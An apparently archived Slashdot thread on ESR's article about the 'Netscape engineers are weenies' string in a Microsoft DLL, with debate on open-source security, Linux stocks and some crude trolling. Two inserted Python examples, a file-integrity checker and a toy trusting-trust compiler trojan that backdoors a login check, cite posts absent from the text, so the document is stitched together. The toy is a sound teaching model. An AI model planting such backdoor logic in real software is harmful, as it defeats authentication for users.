No, I'm sure it uses IIS. You see, you can overcome IIS's shortcomings, it just takes a crapload of redundancy. Microsoft.com is distributed across rows upon countless rows of NT boxes in order to handle the traffic.
Here's my DeCSS mirror. Where's yours?
Here's my DeCSS mirror, where's yours?
Nor will it compensate their bosses for what could be millions of dollars in expenses and business losses.
Now, I don't want to sound like a flamebait poster, but this reminded me of the companies that got Kevin Mitnick in jail. "We lost hundreds of millions of dollars because of him", they said. Were they exaggerating or not?
Seriously, my question is, how can you quantify the expenses and losses of something like this?? How much did the DoS attacks on Yahoo, eBay and others cost? How much money would Microsoft really lose because of a beta copy of Windows Me is on the loose?
I'm not saying that there is no cost, that there will be no problem or expenses for the companies whose webmasters will spend the weekend struggling finding patches for a backdoor that is not really one, but will it be millions of dollars as ESR put it? Isn't installing patches already the webmasters' job? How can there be additional expenses? Where does this figure come from? Can someone explain to me the economics of this?
"All the things one has forgotten scream for help in dreams". Elias Canetti
Hey, you're being sarcastic! Go to Segfault! :-)
It's not really all that bad as you make it sound. Regularly I do see "Microsoft isn't that bad" posts being moderated up, because they have a valid point.
I suffer from attention surplus disorder.
This has already proven to be untrue in the case of Perl at least, as noted in this article in The Register
Open Source makes it harder to remain undetected, but making too much of a deal out of this fact can engender complacency.
Of course it may be a bit of an extreme example, but you get the idea :)
"Evil will always triumph over good, because good is dumb." - Dark Helmet (Spaceballs)
I'm assuming that you're using the information gathered and delivered by Russ, of NTBugTraq. Well then, let me post this, which completely belies his statements. Judge for yourself.
btw, the Excel flight simulator is also easy to get. Again in a new instance, press F5 (Goto) and type the range x97:l97. Press Enter and the range starting at L97 is selected. Press Tab to move the cursor one cell to the right. Then hold down Ctrl and Shift while you click on the Chart Wizard button on the tool bar. Left mouse button accelerates, right button decelerates or accelerates in reverse. Look for and laugh at the scrolling text box ("In the beginning, there was nothing. Then there was Microsoft Excel. (well there were some other versions of Excel before that." (other stuff follows; I can't remember off the top of my head)) and the messed-up wavy lake (as my friend Jeremy Best called it). Have fun, but remember to restart Windows and boot into Linux sooner than later.
Now let me ask you this. Is Microsoft interested in the security of your system? No. They are interested in making money, which is why there are security bugs that go unreported; if anyone was bothering to check the code, a hole that huge would have been found. Last but not least, who runs the Internet? It isn't IIS, my friend. Apache serves almost 60% of the websites you see every day. I have my doubts that M$oft.com even runs on IIS because it isn't built to handle high amounts of traffic. By the way, Apache servers get hammered just as much as IIS with attacks. I've seen logs from Linux webservers. I know what people are trying to get in almost every day. A person who knows what they are doing has good security with Apache. With IIS you may know what you are doing but you have no idea what humorous Microsoft programmers decided to say about Netscape, Linux, Jon Katz, or anyone else :)
The Anti-Blog
Hi!
(Sorry to take so long in responding. Had to do my tax returns. Ugh.)
Any security system requires positions of trust. You have pointed out (much more politely than a couple of others) that root privileges are required to replace pieces of the OS--and since a bad guy has to have root privs, why bother with an exploit?
In a word, "anonymity."
In my career I have been involved with three different cases of system attacks. In each of the three cases the perpetrator was an employee. In one case there was enough evidence to convict the employee and send him to prison. In another case the client didn't want to prosecute--but was so damaged by the exploit that it essentially collapsed. It was acquired by a competitor a few months later and most of the office employees were let go.
In all three cases the perpetrator was a trusted insider. The users had the equivalent (on their systems) of root privs.
What caught the first guy, but didn't catch the second? The first guy was, in effect, using his root privs locally to play around with records (trying to cover up an embezzlement). The second guy did everything remotely--the damage wasn't apparent until 2-3 months after he was gone, by which time it was practically impossible to prove that he was responsible.
I submit that recompiling a file system component, or replacing an ActiveX control, provides the would-be miscreant a higher degree of anonymity, and thus a lower risk of getting caught.
Can you modify a system file in Windows 2000? Yes. (Although trying to replace any system file in 2000 is a pain, even if you're not being malicious.) But hacking the binary is vastly more difficult than recompiling from commented source code, no? Which was my point: it is easier to run an in-house exploit on OSS.
Yours,
John Murdoch
ESR makes a good point in emphasizing that Open Source software can be reviewed by anybody, and actually is reviewed by many developers when a new release is distributed. He is entirely correct in asserting that this process (in essence, peer review) prevents a programmer from widely distributing a back door. That is, without question, a definite plus for Open Source.
On the other hand, there is a definite minus to Open Source--anybody can recompile it. Or even parts of it. So anybody with access to the OS can recompile a small part, substitute that part into the OS, and subsequently replace the original.
For example, suppose I want to snoop on doings in the executive suite. I just modify the file system to write copies into another directory--or send copies of all the CEO's email to my home server. When I have the data I want, I just replace the original versions of the OS--and no one will be the wiser.
You can't do that with closed-source software. Since you don't have the source code, you can't alter the code. So you (or that contract programmer who the company is letting go at the end of the month) can't run a little in-house exploit.
Let me clarify that a bit more: an in-house programmer can't run this kind of exploit using a part of the operating system or a closed-source product (such as a database or email system). However, an in-house programmer can run this kind of exploit on components that he can recompile (such as ActiveX controls). If reasonable source control is in place (everyone must use source control, projects can't be checked out indefinitely) there is little risk. Admittedly, there aren't that many corporations that have reasonable source control policies.
The security problem most corporations face today isn't back doors, or even Trojan Horses. It is the in-house Trojan, put in place by somebody on the inside. It is significantly easier to create an in-house Trojan with OSS.
Which is to say, being "Open" is both a blessing and a curse.
John Murdoch
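One check a practitioner would want against the "swap in a recompiled component, then put the original back" scenario described in the post above, as an added example that is not part of the original post or of any product: a tripwire-style manifest of per-file digests taken while the machine is trusted, re-checked later. Everything here is constructed for illustration (the directory layout, the "fsd" daemon file and its contents, the function names build_manifest and verify are mine), and it runs on a temporary directory so it needs nothing from the host.

```python
"""Minimal file-integrity manifest (tripwire style). Constructed example."""
import hashlib
import os
import tempfile


def sha256_file(path, chunk=1 << 16):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root):
    """Relative path -> (sha256, size, permission bits) for each regular file under root."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue  # symlinks and specials need their own handling; skipped here
            st = os.stat(full)
            manifest[os.path.relpath(full, root)] = (sha256_file(full), st.st_size, st.st_mode & 0o7777)
    return manifest


def verify(root, trusted):
    """Compare the tree under root against a trusted manifest taken earlier."""
    current = build_manifest(root)
    return {
        "modified": sorted(p for p in trusted if p in current and current[p] != trusted[p]),
        "added": sorted(set(current) - set(trusted)),
        "removed": sorted(set(trusted) - set(current)),
    }


def demo():
    """Constructed scenario: an insider installs a rebuilt 'fsd' daemon, later
    restores the original, and finally tries a same-length one-byte patch."""
    with tempfile.TemporaryDirectory() as root:
        sbin = os.path.join(root, "sbin")
        os.mkdir(sbin)
        daemon = os.path.join(sbin, "fsd")
        with open(daemon, "wb") as f:
            f.write(b"honest file-system daemon v1\n")
        with open(os.path.join(root, "etc.conf"), "w") as f:
            f.write("log=/var/log/fsd\n")
        baseline = build_manifest(root)  # taken while the box is still trusted

        # Rebuilt component with the snooping patch goes in.
        with open(daemon, "wb") as f:
            f.write(b"honest file-system daemon v1 + copy CEO mail elsewhere\n")
        during = verify(root, baseline)

        # Original bytes restored: the tree verifies clean again.
        with open(daemon, "wb") as f:
            f.write(b"honest file-system daemon v1\n")
        after_restore = verify(root, baseline)

        # Same length, one byte changed: size checks miss it, the digest does not.
        with open(daemon, "wb") as f:
            f.write(b"honest file-system daemon v2\n")
        subtle = verify(root, baseline)

        return {"during": during, "after_restore": after_restore, "subtle": subtle}


if __name__ == "__main__":
    for stage, report in demo().items():
        print(stage, report)
```

The results make the limits of the check explicit. The swapped component is reported as modified only while it is in place, and the tree verifies clean once the original bytes are back, so the manifest is worth something only if verification runs on a schedule and its reports go somewhere the insider cannot edit. It does catch the same-length one-byte change that a size or timestamp comparison would miss. And none of it helps if the attacker has root on the same box and can rewrite the manifest, which is why such manifests live on read-only media or a separate host.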
I think you're underestimating the importance of this point. Most people are using gcc binaries on linux (or at best gcc-compiled gcc), because bootstrapping a compiler is a tricky and painful process. If redhat or any of the major distros accidentally released an "infected" gcc (or even if some other group released a popular "pentium III optimized" compiler, or something), this could really happen.
This same problem also affects the GPL itself -- consider making enhancements to a GPL program which also extend the source language (in a proprietary, perhaps undocumented way). You must release the source code to your enhancements but now they're as good as proprietary, since you can't use the source without a compiler which supports the extensions!
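The compiler trick described in the post above, in the earlier "famous back door in OSS software" post, and the defence from the mini-C bootstrapping post, as an added toy model that is not code from the thread or from any real compiler. The "language" being compiled is Python itself, so an honest compiler is the identity transform and "object code" is text we exec(). The sample login program, the clean compiler source and the master password are all constructed; the master password is deliberately not the string found in the Microsoft DLL, which the thread says was never a password.

```python
"""Toy model of Thompson's "Reflections on Trusting Trust" attack and of the
independent-compiler bootstrap check. Constructed illustration."""
import hashlib

# Constructed sample sources. Neither contains anything suspicious.
LOGIN_SRC = '''\
def check_password(user, password):
    return user == "alice" and password == "correct horse"
'''

CLEAN_COMPILER_SRC = '''\
def compile(src):
    return src
'''

# Hypothetical master password the attacker wants every login build to accept.
MASTER = "constructed-master-key"

# Object-code fragment the trojaned compiler appends whenever it compiles login.
BACKDOOR = '''
_honest_check = check_password
def check_password(user, password):
    return password == "''' + MASTER + '''" or _honest_check(user, password)
'''

# Source of the trojaned compiler. Branch 1 backdoors login. Branch 2 notices a
# compiler being compiled and emits itself (plus its constants) instead of the
# honest source it was handed, so the trojan survives a rebuild from clean source.
TROJAN_BODY = '''\
def compile(src):
    if "def check_password(" in src and "_honest_check" not in src:
        src = src + BACKDOOR
    if "def compile(" in src and "_honest_check" not in src:
        src = ("BACKDOOR = " + repr(BACKDOOR) + "\\n"
               + "TROJAN_BODY = " + repr(TROJAN_BODY) + "\\n"
               + TROJAN_BODY)
    return src
'''


def trojaned_object_code():
    """Object code of the first-generation trojaned compiler (the 'infected gcc')."""
    return ("BACKDOOR = " + repr(BACKDOOR) + "\n"
            + "TROJAN_BODY = " + repr(TROJAN_BODY) + "\n"
            + TROJAN_BODY)


def load(object_code):
    """'Run' object code and return the namespace it defines."""
    ns = {}
    exec(object_code, ns)
    return ns


def digest(text):
    return hashlib.sha256(text.encode()).hexdigest()


def demo():
    results = {}
    # The trusted bootstrap compiler (the thread's "mini-C"): small enough to
    # audit by hand and built without any help from the suspect toolchain.
    trusted = load(CLEAN_COMPILER_SRC)["compile"]
    evil = load(trojaned_object_code())["compile"]

    # Rebuild the compiler from its CLEAN source using the trojaned binary...
    gen2 = load(evil(CLEAN_COMPILER_SRC))["compile"]
    # ...then build login from its clean source with that second-generation compiler.
    login = load(gen2(LOGIN_SRC))
    results["backdoor_survives"] = login["check_password"]("anyone", MASTER)
    results["normal_login_still_works"] = login["check_password"]("alice", "correct horse")
    # Reading the source finds nothing: the master key appears in no source file.
    results["source_is_clean"] = MASTER not in CLEAN_COMPILER_SRC + LOGIN_SRC

    # The check: compile the same sources with the independent compiler and compare.
    trusted_login = load(trusted(LOGIN_SRC))
    results["independent_build_clean"] = not trusted_login["check_password"]("anyone", MASTER)
    results["object_code_differs"] = digest(gen2(LOGIN_SRC)) != digest(trusted(LOGIN_SRC))
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The results show the point both posts make: source_is_clean and backdoor_survives are both True, so a code-difference report of the kind ESR relies on never shows the backdoor. It is exposed only when the same sources are compiled with an independent compiler and the object code compared (object_code_differs), which is exactly the job of the hand-verifiable bootstrap compiler. Against a real toolchain the trojan must keep recognising the compiler and login through refactoring, optimisation flags and new releases, which is what makes it fragile in practice and why the attack is a warning about trust rather than a common event.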
I take it you lost some cash buying their stock??
no sig.
Another ESR speaks. (For those of you interested.) http://linuxtoday.com/stories/13512_flat.html
What's that sound? My karma plummeting!
A good quote: "Ironically enough, one result of my getting rich is that I will probably start charging for speaking appearances, now that nobody can plausibly accuse me of doing it for the money. I won't charge open-source user groups or schools, but I will cheerfully extract a per diem from all the business conferences that keep wanting me to boost their box office. Charging a price for my time will separate the expensive conferences that attract powerful people from the marginal events where the hacker community would get less leverage from my presence." :-)
Be thankful you are not my student. You would not get a high grade for such a design
You don't like Slashdot.. Slashdot doesn't like you. Nobody forces you to come here and pull your "sand in the vaseline". And yet still you are here. Why is this we ask? hmm look at that hotmail address.. who pays your bills??
/you/ consider worthwhile deserves flaming... Personally, I believed the /. story when it started. As soon as the update came out that it was a non-issue, I knew things like this would erupt.
/. a break for posting stories as they come... /., be more careful about the 'opinions' expressed in the articles, cuz if something changes, it can come back and slap you in the face...
If you hail Open Source so much because it gives everyone a say in the result, then how could you get defensive when someone criticizes something about Slashdot? Are you saying you feel like cutting off everyone who has something negative to say about it? Now that's open...
So anyone with a good/bad word for anything
1) Give
2)
This is really getting ridiculous. Just ONCE I would like to view Slashdot at threshold=0 and feel good about the future of the human race.
Regarding this story - I do see it as anti-microsoft and i see the story being taken a different direction other than where the facts say - the facts say M$ has a backdoor in their software. The story says USE APACHE - NO BACK DOORS EVER.
BUT: It is this dude's right to have an opinion about this announcement. It is no reason to post all this garbage about VA linux. Everyone knows its not doing too hot. But i would bet that none of these trolls are the CEO of a publicly traded company.
This is a call to the human nature of posters on
~zero
insert clever line here
sig?
One Word: Sendmail.
Diplomacy is the art of saying "nice doggy" until you can find a rock.
Actually, this was written a day or two ago; I think that I saw it on LinuxToday first. Slashdot is just *posting* it a day or two late.
"cmdrtaco and crew seem to ignore all of this for some reason or another."
The reason is completely obvious. Ask yourself these three questions:
***What company did CmdrTaco first sell Slashdot to?
***What well known Linux company subsequently bought Andover?
***Is said company's stock below its IPO price?
Editorial independence...blah. CmdrTaco and company have sold Slashdot readers down the river for a quick profit. Corporate conscience?!?! Maybe it's time Slashdot, VALinux, and Andover got on the cluetrain too. Today's markets are smarter than ever before and the individuals who participate in these markets are able to communicate with each other faster than companies can inhibit or stop this communication. You can't ignore us, you can't control us, and you can't stop us. Enjoying those millions, ESR, RobLimo, CmdrTaco, and company? Well enjoy them now, since a new revolution in information is coming and you're going to be left behind.
Because they are not utterly irresponsible companies which have sold their souls to the imperative of a quick profit (ahem, Slashdot). They realize that acting like single-minded zealots and wantonly spreading FUD will only decrease their public image, especially when the people are bright enough to know that *there is no backdoor* worth publicizing. It's called responsible journalism and business ethics, something that CmdrTaco, ESR, and company seem to have forgotten or misplaced in their Linux IPO mania.
I've disagreed with the prevailing Slashdot conventional wisdom, so I'm going to lose massive karma because some moderator will feel the urge to suppress dissenting opinions.
This has already been a well-publicized problem for the past two days. I mean, it's even on ZDNet and Cnet. Oh well, I suppose that waiting this long would mean that ESR had time to verify all of his facts.
Oops, it seems that he didn't. Anyway, the string "Netscape engineers are weenies" is indeed embedded backwards inside the referenced dll file. However, this does not allow arbitrary access to websites, nor is it some sort of hidden backdoor password. If you already have authoring permissions on a server, the dll will allow you to read the web pages of other sites that may also be hosted on the server. Essentially, the wall between theoretically independent virtual hosted sites is slightly reduced. The flaw does NOT allow one to modify content, nor does it allow one access to information that is protected by NTFS permissions instead of IIS permissions. The real use of the string is to name mangle all URL requests of a certain form before use by the Microsoft Interdev 1.0 software.
Interestingly enough, the scrutiny under which this dll has been examined has revealed the existence of a *real* problem, a buffer overflow that is theoretically exploitable (I'm not sure of the details, but IIRC, it's an unlength-checked strcpy). Open-source software does help expose deliberately placed backdoors, however, it does not target the problem that caused the Microsoft flaw in the first place: untrustworthy programmers. No project, closed source or open source, run under the cathedral model or the bazaar model, can escape the fundamental concept of information security: you must place at least some implicit trust on the people who build/maintain/administer your software. Open source software allows others oversight so that they can spot this type of problem (witness the Dansie Shopping Cart backdoor), but cannot act as a magic pill that solves all problems of this nature. It is naive to believe that just making something open source makes it inherently more difficult to include backdoors and "design for insecurity." This just reiterates and reemphasizes the need for continual code audits and scrutiny of all executable code in secure operating environments.
*borkborkbork*
Though it is off topic, reading these posts brings to mind one central question:
Why is ESR afforded so much attention?
Based on what I have seen, I fail to see where or how he has contributed to the open source movement in even the most trivial of ways.
While he has certainly done well for himself, (speaking engagements, etc.) acting as a self proclaimed spokesman for the open source community what has he really contributed to that same community (Does fetchmail really count)?
There are any number of real contributors to the open source community (Larry Wall, Richard Stallman, anyone in the apache foundation just to name a few) out there. Anyone of which would be happy to comment on any aspect of the open source phenomenon and its impact on the software world in general.
So why waste even an ounce of attention on ESR?
The real question is: can we trust closed source software providers? There is no simple answer. We can not trust Microsoft (DOJ, Antitrust suit) for different reasons, don't even have to find any backdoors. In principle Microsoft or any other software vendor can not afford to have any of their software compromised in this way if they wish to keep their sales up. Basically, there is an incentive for them to produce 'good' software and not 'bad' software; of course it does not mean they will do that right.
On the other hand we can not really know how many different backdoors there are in what kind of software out there. If NSA or the feds want Microsoft to allow them to search anyone's computer without too much hassle, Microsoft will have to put some back door in their software. - What happens to the peer checks, I wonder?
Clearly, a respectable company will not jeopardize their businesses by putting "back doors" in their binaries.
In this case Microsoft screwed up in multiple ways, they did not encrypt the string that is used as an encryption key by itself. The wording in the string they used (the 'weenies')- it's not just childish, it's dumb.
Back to our question - should we trust our closed source vendors? I think we can trust them not to jeopardize their businesses too much, but we should be cautious and do our research before using any software like that for any serious businesses. Linux definitely is the winner in this criteria.
You can't handle the truth.
http://www.it-analysis.com/00-04-14-3.html
Is it a sign that Microsoft is now considering Linux?
Well, it isn't exactly a myth -- they are falling, and falling rapidly.
But many other stocks are falling as well, with Linux falling somewhat worse. Even high rollers with great quarters (SUN, AMD) are taking an undeserved beating.
So, the questions comes down to:
1) Are Linux stocks are falling rapidly because it is a failed product?
2) Or are Linux stocks are falling rapidly for other reasons...
Clearly, the answer IS NOT #1! Even through shithead organizations like the United States Air Force and Navy, who routinely kneel behind Bill Gates and give him a good licking, there is still rapid growth in Linux in many areas.
At least the US Army has the balls to think a little out of the box, with their use of Apple webservers and influence in having National Instruments port LabVIEW over to Linux.
To characterize Linux as "failed" because it does poorly in the stock market is to ignore its roots and phenomenal growth over the last several years, before it was ever "on the market".
A more likely cause is (for lack of a better term) "Techie Insider IPO Fever". That is, geeky people with money, and internet "knowledge", but no real stock market experience, investing in "hot" items as they come on the market, things they "know about", and then bailing out when the stock tops out. MP3, RedHat, VA Linux, Andover. Main stream, long term investors did not buy these until they started ramping up!
The horrid state of the stock market (ridiculous PE ratios, etc), Greenspan's never-ending interest rate increases, the clear indicators of inflation setting in, combined with the poor performance of the dot-coms has led to a backlash against the market, and tech in particular -- and the newcomer to tech was Linux. Of course it is being hit harder.
Sophisticated, forward thinking people didn't buy Linux -- geeks out for a quick killing, and no sense of what the market is really for, bought Linux.
Anyway, all these Linux companies taking a beating will probably struggle on. They did it all for free (or at a loss) for years anyway. This is nothing new -- I personally think Linux will dominate everything at some point.
Add in some sort of legislation giving tax breaks to companies/corporations deploying non-MSHAFT solutions, or a mandate to reduce government usage/purchases of MSHAFT products/services, or even a speech from Clinton declaring America's overdependence on MSHAFT software a threat to national security (in the same way a single radio/tv entity would be a threat), and you might see these stocks bounce back up fairly rapidly.
Besides, the last time I looked through the classifieds in the region where I live, there were over a hundred Linux developer openings.
There were only five a year and a half ago. And for all the bitching I see about VA Linux, source forge is pretty cool.
Treatment, not tyranny. End the drug war and free our American POWs.
See my user info for links.
I thought ESR's prediction that the "...US Economy...would crater..." before his six-month holding period was up was particularly interesting.
Treatment, not tyranny. End the drug war and free our American POWs.
See my user info for links.
All I'm saying is that Microsoft has the right to exist. Whether or not I agree with what they have done isn't the issue... I think this editorial slams Microsoft for the purpose of slamming Microsoft.
When you write for a publication, I think you have the responsibility to look at an issue from both sides. This article was blatantly one-sided. ESR dropped the ball on this one. What he says here reflects back on slashdot as a whole, and I hope slashdot isn't in the business of throwing stones at a company (or anything for that matter) because of personal feelings toward that company.
On the issue of responsibility... Personally I feel that if this hole has cost web developers money, Microsoft should be held responsible.
Regardless of personal feelings, Microsoft still deserves the same treatment as any other company. It would be hypocritical of us to deny them that just because we don't like what they've done.
"Happiness in intelligent people is the rarest thing I know."
-- Ernest Hemingway
As much as I dislike Microsoft's products and general business tactics, I don't go around telling people how much they suck. I just show people alternatives. (be it Linux, BeOS or whatever)
Microsoft has a right to exist. Kicking them while they're down doesn't help matters much. Microsoft will get what's coming to them in the near future.
I always thought slashdot at least attempted to be serious about journalism. This story has given me doubts. Perhaps a moderation script for the mainpage would be in order.
Stripped of all the hype, the worst thing to come out of this is that, apparently, the string "Netscape engineers are weenies!!", reversed, is used in an obsolete version of a Microsoft support DLL (which, BTW, may have its roots in non-Microsoft legacy FrontPage code...) as a 'secret' to 'encrypt' web pages in transit. This is definitely a bad security design (as well as childish), but in this case it happens not to hurt anybody (except perhaps the ego of the few remaining Netscape engineers :-)
The kicker in this article is the claim that there would never be anything like this in the "BIND library" -- well, the library might not have any issues, but BIND itself sure has been the source of a number of root exploits so far, and there is no guarantee whatsoever that this won't happen again in the future.
FUD should not become a standard for Linux advocacy...
Shut up brain or I'll stab you with a Q-Tip. - Homer Simpson
Damn well better be, since I'm not vested until next January. 'Bout shit my pants this month.
He has 150,000 shares of lnux. Even if the price drops to $5 (hehe) he's still got $3/4 million. Not super-rich, but not exactly scroungin' for change.
This should be a place where intelligent people discuss the subjects, not a Linux Uber-Alles site. Why do you think there are so many ugly flames at 0 and -1? I think it's in part because they see the vacuity of much of the "serious" discussion. Notice that when a topic is posted that generates more intelligent and informed discussion, like the one last night about diesel engines, there are far fewer obscene flames.
Saying somebody is "biased" means nothing. It just means somebody has formed an opinion. There is no evidence at all that Zico is a troll. He just seems like somebody who is sincere in his unconventional (for Slashdot) beliefs. Zico is typically well-reasoned. He is a healthy counterbalance to the pro-linux zealotry and anti-MS FUD that fills up Slashdot. To repeat: it is a GOOD THING when intelligent people disagree. That's what Slashdot is supposed to be about.
Finally incontrovertible proof that security on the basis of obscurity is a complete illusion.
But why isn't Red Hat or VA or *someone* running ads with their newly gained cash about this? When are they gonna learn to seize the moment? Especially after THE trial, why aren't they ripping the guts out of Microsoft? rob
This has been present for FOUR years? That has really got to hurt Microsoft's reputation. Easy to use, absolutely. User-friendly? Of course! Secure? Umm, I'll take a rain check on that (patch released a month later).
Microsoft has been known for making buggy software, but whenever Windows crashes on me, it's (usually) because of an extreme load or some program crashing that ends up taking kernel32 down with it. To actually and purposely place a security flaw in a program is just unthinkable. Geez, what do you say to something like that?!?
Things just aren't going too well for them recently. What a shame.
$3/4 million? After taxes he's well below most Silicon Valley receptionists.
It would be amusing if it were as simple as this, but the value of linux corresponds to its adoption by major vendors. These vendors are paying close attention to the profitability of the linux market, which so far is certainly in question.
What do you get with Open Source? You got it, a crappy closed-market operating system like Linux. If a company spends millions and millions of dollars making a product, they should be allowed to keep how it works secret. If this causes major problems, people will stop using that product, which is obviously not the case with Windows. Even with the most minor security problem, Microsoft has everyone's computer in the world pop up a window that says, 'CRITICAL UPDATE AVAILABLE! DOWNLOAD NOW,' which makes that 'backdoor' never be used to do any major damage.
What does do major damage? All these open-source holier-than-Microsoft "hackers" who spend all their time praying to their open source gods making spoofers and routers and god knows what to take down Buy.com for giggles and poops.
- Jeremy Fuller
You don't like Slashdot.. Slashdot doesn't like you. Nobody forces you to come here and pull your "sand in the vaseline". And yet still you are here. Why is this, we ask? Hmm, look at that hotmail address.. who pays your bills??
'There is a Light that never goes out.'
Why do that when you can crawl inside my ass and give me a... TOSSED SALAD! ;) bitch
--
Trollin' fer syrup!
Eww, you gelatinous bastard.
Chris Rock rulez!!!
You would really have to wonder what goes through the minds of the Microsoft engineers when they're designing and writing the code for Windows and its products. The company is in the middle of an anti-trust minefield yet it insists on giving the middle finger in the way it acts. So what if it was another company that was doing that? Or even the beloved Linus (tux bless his soul) who could have an evil motive for writing code... Would as many ppl throw up their arms and go on a witch hunt looking for the evil programmers behind this nasty and wicked code? Would you mind if Linus and his buds were getting r00t on your box? Or would you rather Bill Gates checking to make sure that you've registered and bought all of his company products? (haven't we all ;) Oh well, I've ranted enough today, time to fill up my Jim Beam glass...
Be you Admins? nay, we are but lusers!
... a Microsoft® Cluster Server© cluster of these?
Thank you.
... would a program that maliciously lowers the stock price of Linux-oriented companies -- and then prevents Linux-oriented web sites from mentioning the matter -- be termed a "virus", a "worm", a "trojan horse", or what?
Thank you.
Thanks, that's just what the ASS STUFFING community wanted. rEMEMBER what to dooooooooooooo!
__ STUFF LINUX IN YOUR ASS.